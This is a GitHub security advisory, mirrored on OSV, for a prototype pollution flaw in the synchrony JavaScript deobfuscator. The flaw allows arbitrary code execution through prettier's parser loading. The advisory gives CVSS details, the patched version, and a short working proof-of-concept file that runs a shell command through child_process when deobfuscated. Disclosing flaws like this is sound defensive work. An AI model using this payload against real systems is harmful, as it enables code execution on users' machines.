OSV (Google): GHSA-JG82-XH3W-RHXX
History: Oct 18, 2023 - 6:27 p.m.

Synchrony deobfuscator prototype pollution vulnerability leading to arbitrary code execution

2023-10-18 18:27:13
Source: Google, osv.dev
synchrony
deobfuscator
prototype pollution
vulnerability
arbitrary code execution
__proto__
literalmap
patch
mitigation
node.js

CVSS3: 8.1
Attack Vector: LOCAL
Attack Complexity: HIGH
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS: 0
Percentile: 9.8%

Impact

A __proto__ pollution vulnerability exists in synchrony versions before v2.4.4. Successful exploitation, which requires synchrony to deobfuscate a crafted input file, could lead to arbitrary code execution in the process running synchrony.

Summary

A __proto__ pollution vulnerability exists in the LiteralMap transformer: a crafted input file can make the transformer write properties onto Object.prototype, so every object in the process inherits them.

When synchrony runs under Node.js, the polluted property reaches the prettier module that synchrony uses. If the crafted input defines a parser property on __proto__ whose value is a path to a JS module on disk, that value is passed to require, which loads and executes the module, leading to arbitrary code execution.

Patch

A fix has been released in synchrony@2.4.4.

Mitigation

Proof of Concept

Craft a malicious input file named poc.js as follows:

// Malicious code to be run after this file is imported. Logs the result of shell command "dir" to the console.
console.log(require('child_process').execSync('dir').toString())

// Synchrony exploit PoC
{
  var __proto__ = { parser: 'poc.js' }
}

Then, run synchrony poc.js from the same directory as the malicious file.

Credits

This vulnerability was found and disclosed by William Khem-Marquez.
